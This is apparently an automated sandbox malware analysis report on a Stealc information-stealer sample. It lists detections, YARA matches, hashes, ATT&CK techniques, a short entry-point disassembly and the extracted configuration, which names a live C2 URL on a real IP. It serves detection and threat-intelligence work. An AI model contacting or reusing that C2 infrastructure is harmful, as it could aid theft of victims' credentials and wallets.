Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543326
MD5: 8695564cd767158ca851e966afaea1be
SHA1: 9e09cc44a9690ddc846a3d0b850fe324db91b721
SHA256: a73bfdae65dadc72f634652cbd12579f0f57448a2cd52d34b4892a937bba6126
Tags: exe user-Bitsight

Detection

Stealc
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
PE file has a writeable .text section
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to read the PEB
Found potential string decryption / allocating functions
One or more processes crash
PE file does not import any functions
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8695564CD767158CA851E966AFAEA1BE)
    • WerFault.exe (PID: 6976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 168 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Extracted malware configuration: {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Yara matches (sample):
Source | Rule | Description | Author
file.exe | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
file.exe | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Yara matches (memory):
Source | Rule | Description | Author
00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000000.1677009646.0000000000401000.00000080.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6752 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

Yara matches (unpacked PE):
Source | Rule | Description | Author
0.2.file.exe.400000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.0.file.exe.400000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched
No Suricata rule has matched

                AV Detection

Source: file.exe; Avira: detected
Source: 0.0.file.exe.400000.0.unpack; Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: file.exe; ReversingLabs: Detection: 52%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
Source: file.exe; Joe Sandbox ML: detected
Source: file.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                Networking

Source: Malware configuration extractor; URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: Amcache.hve.3.dr; String found in binary or memory: http://upx.sf.net

                System Summary

Source: file.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\file.exe; Code function: String function: 004045C0 appears 288 times
Source: C:\Users\user\Desktop\file.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 168
Source: file.exe; Static PE information: No import functions for PE file found
Source: file.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine; Classification label: mal96.troj.evad.winEXE@2/5@0/0
Source: C:\Windows\SysWOW64\WerFault.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6752
Source: C:\Windows\SysWOW64\WerFault.exe; File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f122f969-d4a1-4d63-a877-63806614aad2
Source: C:\Users\user\Desktop\file.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe; ReversingLabs: Detection: 52%
Source: unknown; Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe; Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: z .dll
Source: file.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0041B035 push ecx; ret 0_2_0041B048
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: Amcache.hve.3.dr; Binary or memory string: VMware
Source: Amcache.hve.3.dr; Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr; Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr; Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr; Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr; Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr; Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr; Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr; Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr; Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr; Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr; Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr; Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr; Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr; Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr; Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr; Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr; Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr; Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr; Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr; Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00419750 mov eax, dword ptr fs:[00000030h] 0_2_00419750

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match; File source: file.exe, type: SAMPLE
Source: Yara match; File source: Process Memory Space: file.exe PID: 6752, type: MEMORYSTR
Source: Amcache.hve.3.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr; Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr; Binary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

Source: Yara match; File source: file.exe, type: SAMPLE
Source: Yara match; File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.1677009646.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

                Remote Access Functionality

Source: Yara match; File source: file.exe, type: SAMPLE
Source: Yara match; File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.1677009646.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques with matching signatures (number of matching signatures in parentheses):
  • Persistence: DLL Side-Loading (1)
  • Privilege Escalation: Process Injection (1), DLL Side-Loading (1)
  • Defense Evasion: Virtualization/Sandbox Evasion (1), Process Injection (1), Deobfuscate/Decode Files or Information (1), DLL Side-Loading (1), Obfuscated Files or Information (2)
  • Discovery: Security Software Discovery (21), Virtualization/Sandbox Evasion (1), System Information Discovery (1)
  • Command and Control: Application Layer Protocol (1)
  • Reconnaissance, Resource Development, Initial Access, Execution, Credential Access, Lateral Movement, Collection, Exfiltration, Impact: no matching signatures
Antivirus detection (sample):
Source | Detection | Scanner | Label
file.exe | 53% | ReversingLabs | Win32.Trojan.Stealerc
file.exe | 100% | Avira | HEUR/AGEN.1352833
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches

URL reputation:
Source | Detection | Scanner | Label
http://upx.sf.net | 0% | URL Reputation | safe
No contacted domains info

Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/e2b1563c6670f193.php | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://upx.sf.net | Amcache.hve.3.dr | false | URL Reputation: safe | unknown
No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1543326
Start date and time: 2024-10-27 17:51:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal96.troj.evad.winEXE@2/5@0/0
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 20
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.182.143.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 6752 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• VT rate limit hit for: file.exe
Time | Type | Description
12:52:09 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
No context
Dropped file 1
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.624102125069693
Encrypted: false
SSDEEP: 192:cJ9ZgWGTA66kDvnPlD0NXfAI3jEzuiFCZ24IO8TVB:iNa6SndwNXfXjEzuiFCY4IO8X
MD5: 88898FA28C7AFCC18745EF1E2665C5E1
SHA1: D9912E50FF0BFCB69C31CA16F5B83BD57ABD0BBE
SHA-256: D4F38AA3594D7A084B1224354B4653287CD797BD22EBAFAB89B0DC7C7CDDDD19
SHA-512: 97E6B31023D2A7EC408DBAD49C35D28D3556704B1B3A4A80972CC7E8C766ABD412F869BB82087555646838C5E2768F9915784760F40D3092F029901F080088D2
Malicious: true
Reputation: low

Dropped file 2
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Sun Oct 27 16:51:55 2024, 0x1205a4 type
Category: dropped
Size (bytes): 25888
Entropy (8bit): 1.9483084314963992
Encrypted: false
SSDEEP: 96:5e8XNpw6GEGiBYgti7nao7q1fdZKMbeeeI1z6Ju/ZmWI/WI3II5BsN/e0v:zZ91tOaF1fdZKGeE1zawZGBsdP
MD5: 087B5BEC47F60CB3B4E94878B73A49B3
SHA1: A68E6BF201FB6FF4BDFC7D45039A2D37D960713A
SHA-256: 3B7C0F99C0A2FA2A387071F2C61FD73E201729F9B801A3A1EC94A91704316F9C
SHA-512: A7192F90CECD73BD01E0B9D1D8CC4AD08D92A769686120520943D76DAB6D031338B990D1041CDAE8E81A4CBD762FB5CCDD9795AFF36F33EDC8B4F05E1E3BEA0E
Malicious: false
Reputation: low

Dropped file 3
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8270
Entropy (8bit): 3.6902521499963292
Encrypted: false
SSDEEP: 192:R6l7wVeJyC46O6Y9bSUxgmfBnJbWOapxt89bRysfsZgt7m:R6lXJO6O6YhSUxgmfxJbWOHRxfIz
MD5: 429F98C27A4861E5089D77418F8CDAF2
SHA1: D1D95358AAD709983F2E209E3F9C09B19B79D94B
SHA-256: 13E58C56A986D208D9FD1AA279D336BB6CE7480E00C011007F7B65D0C8DEB79D
SHA-512: 17DDEEA7C682564273F6EBD3BC681D74D64211C5C509B7759EF4BB9E6DDE1DA8D18616EC2257FD6B509DD8454A32160AC3373D6414EB5F58C4E1C55F5CF546CD
Malicious: false
Reputation: low

Dropped file 4
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4555
Entropy (8bit): 4.428779080972921
Encrypted: false
SSDEEP: 48:cvIwWl8zskJg77aI9W5WpW8VY9Ym8M4JguFBd+q8AR0pUxred:uIjfiI7wI7VFJtdh0psred
MD5: F5D81A94032C6AFBB287C093BC4AA221
SHA1: 172ADF583B26AA47D386E1977F34FE7F9DC8FA50
SHA-256: A9B4FA1BF62CDD5302842CE223C4D0D8096F95E1CCCFF7DFA7EBB5B3F96AA056
SHA-512: 558BC2E051BDE020B6A9426BD8CEA5F1419EEB48FBFFCB026C4578370B8E55178DE959E52CB524087FC98177C46135F671A71795EBEFA3A5311D038C63C2874F
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="562074" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1835008
                  Entropy (8bit):4.465307673921024
                  Encrypted:false
                  SSDEEP:6144:zIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbD:kXD94+WlLZMM6YFH1+D
                  MD5:91B129A7BDDDE8A0ADC6BF31DA4D5ED4
                  SHA1:1FBF8D2D4CFC584A290AC1B035A33C5659F49FA6
                  SHA-256:B28E6406EB281EC58BF1781ABFF40F92AD14EA9E332CACF5B4B86C3A30390FBF
                  SHA-512:4C907A2693E2A8F3B512DAABEE44D35E7241D5AEC13309BC4174B8999A854D03ECE1AA51D7664EDD7755A97121A3C50F1F3CE822F7798559086306F865A35FAB
                  Malicious:false
                  Reputation:low
                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~]...(..............................................................................................................................................................................................................................................................................................................................................H.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.587835052916894
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:314'368 bytes
                  MD5:8695564cd767158ca851e966afaea1be
                  SHA1:9e09cc44a9690ddc846a3d0b850fe324db91b721
                  SHA256:a73bfdae65dadc72f634652cbd12579f0f57448a2cd52d34b4892a937bba6126
                  SHA512:7ab2e14d9b34146c8c03cc4b2c99e1cb6cd3ef7de2274fb9c23e633316051e66cd5d1c070aa37b8625586075a20be6bf9fa04825facef57eb49a50470ce75b02
                  SSDEEP:6144:2Ei8gYtUokCulxMfpbSGePV0zxqgFIp5cn5nGusLJ+mzxCC:jtUoH3IGgV04gFWk5nGNLFzxCC
                  TLSH:8C649D31F641487ED68302BD619EAF3EDE76A9160310CCD793D05DA426F42F2A935A2F
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........
                  Icon Hash:90cececece8e8eb0
                  Entrypoint:0x4169f0
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:
                  Instruction
                  push ebp
                  mov ebp, esp
                  sub esp, 4Ch
                  call 00007F3C008F41FAh
                  call 00007F3C0090B7F5h
                  push 00420AEFh
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007F3C0090C6C8h
                  call 00007F3C008F3153h
                  call 00007F3C008F30DEh
                  call 00007F3C008F3089h
                  call 00007F3C008F3194h
                  call 00007F3C009086DFh
                  call 00007F3C008F30FAh
                  call 00007F3C009097B5h
                  push eax
                  lea eax, dword ptr [ebp-4Ch]
                  push eax
                  push 00421110h
                  lea ecx, dword ptr [ebp-40h]
                  push ecx
                  call 00007F3C00909832h
                  push eax
                  lea edx, dword ptr [ebp-34h]
                  push edx
                  push 0042110Ch
                  lea eax, dword ptr [ebp-28h]
                  push eax
                  mov ecx, dword ptr [0064A540h]
                  push ecx
                  lea edx, dword ptr [ebp-1Ch]
                  push edx
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007F3C0090C8E1h
                  mov ecx, eax
                  call 00007F3C0090C8DAh
                  mov ecx, eax
                  call 00007F3C0090C8D3h
                  mov ecx, eax
                  call 00007F3C0090C8CCh
                  mov ecx, eax
                  call 00007F3C0090C8C5h
                  push eax
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007F3C0090C7ACh
                  lea ecx, dword ptr [ebp-4Ch]
                  call 00007F3C0090C704h
                  lea ecx, dword ptr [ebp-40h]
                  call 00007F3C0090C6FCh
                  lea ecx, dword ptr [ebp-34h]
                  call 00007F3C0090C6F4h
                  lea ecx, dword ptr [ebp-28h]
                  call 00007F3C0090C6ECh
                  lea ecx, dword ptr [ebp-1Ch]
                  call 00007F3C0090C6E4h
                  mov eax, 00000001h
                  test eax, eax
                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [LNK] VS2010 build 30319
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2aa28 | 0x3c | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25c000 | 0x24e0 | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x1e000 | 0x104 | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x1cc8f | 0x1ce00 | fb22f0b514c5db684208b2499bd77bdb | False | 0.4681750541125541 | Matlab v4 mat-file (little endian) \352\316A, numeric, rows 4316256, columns 0 | 6.092231741918131 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rdata | 0x1e000 | 0xcf8c | 0xd000 | 732837f5aaecdff037ef74441bb0a3ee | False | 0.5279634915865384 | data | 6.659998187691008 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0x2b000 | 0x2303a4 | 0x1e400 | 6b183f83d278d8208a03ee7e3cbf838e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .reloc | 0x25c000 | 0x459e | 0x4600 | 7f93d7276b928e946c8185ceefd82424 | False | 0.5563058035714286 | data | 6.437243687517982 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  No network behavior found
                  Target ID:0
                  Start time:12:51:55
                  Start date:27/10/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x400000
                  File size:314'368 bytes
                  MD5 hash:8695564CD767158CA851E966AFAEA1BE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000000.1677009646.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false

                  Target ID:3
                  Start time:12:51:55
                  Start date:27/10/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 168
                  Imagebase:0xce0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 021OTKHJ7TL$0BGDHM9BC4G2H3420KF7$2NT3UR$2T8033P3KK93$32ISMD934$54YY1JOO$5YYWNEPNXQNSHZ3ON4GK$7AT_"a)-?$8T5M0GNJQQAUCUPYGOZE$8XPFFV33DMU0$9LSY0RL2ILTGHUS46S1U$9M3BL5MTFXR$A=7R;4$BPNCHSQTJ$C58OPCCHD60$CK6BSOT5ZREN9$CSVO916W9$CZBMT$ECC0AD71CI6E$F49M5L3AA3$GA7UNGPL8RX3$ITQ4BKZ75OYV93$IX0PKDWZ4EHQSM$KSL7F93BENOJU9XYV7$NA2MZZJC060$QRC6L0IPXZ0IDN4B$RJU5ODZ967Y6$RUPS7DKWGME$TMRVHYFQ$TVDPNVXO$U4FMQ8JTS6Q9S$UPQDL6SWIRKI$VEDEJA$W930UY3$WP6B64HMI0$X5LMIIPI8H1ML$Y2VHXS3R7$Y503NOMAS$Y<&'6?$YJJRRF5$ZMYLOTG5UO1GD60BU$ZQ5DXRH84BD5268$f]M`u+6ga^E$u1Le@V"}*&\r
                    • API String ID: 0-4117208749
